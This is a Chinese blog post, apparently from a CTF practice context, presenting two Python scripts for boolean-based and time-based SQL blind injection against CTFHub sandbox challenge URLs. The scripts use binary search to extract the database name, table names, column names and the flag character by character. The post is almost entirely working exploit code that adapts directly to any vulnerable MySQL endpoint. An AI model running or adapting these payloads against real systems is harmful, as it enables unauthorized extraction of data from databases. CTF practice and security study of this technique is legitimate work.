zoukankan      html  css  js  c++  java

  • sql布尔盲注和时间盲注的二分脚本

    布尔盲注:

    import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_table(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_column(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def flag(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
			params = {'id':payload}
			r = requests.get(url,params = params)
			if "query_success" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)

    时间盲注:

    import requests
import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_table(url):
	name = ''

	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def inject_column(url):
	name = ''
	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

def flag(url):
	name = ''
	for i in range(1,100000):
		low = 32
		high = 128
		mid = (low + high) // 2
		while low < high:
			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
			params = {'id':payload}
			start_time = time.time()	#	注入前的系统时间
			r = requests.get(url,params = params)
			end_time = time.time()		# 	注入后的时间
			if end_time - start_time > 1:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) // 2

		if mid == 32:
			break
		name = name + chr(mid)	
		print (name)

# inject_database(url)
# inject_table(url)
# inject_column(url)
flag(url)
  • 相关阅读:
    oracle的根容器下新建pdb容器及本地用户
    oracle监听配置与防火墙问题
    oracle问题:ORA-09817及解决办法
    Oracle:Ora-01652无法通过128(在temp表空间中)扩展temp段的过程-解决步骤
    oracle:ORA-14765建索引阻塞创建分区及处理步骤
    oracle-组合索引字段位置与查询效率之间的关系
    hbase的split策略和预分区
    启动hbase后hmaster自动关闭
    hive一级分区、二级分区、动态分区
    hive beeline连接和交互shell连接
  • 原文地址:https://www.cnblogs.com/lemon629/p/13870659.html
Copyright © 2011-2022 走看看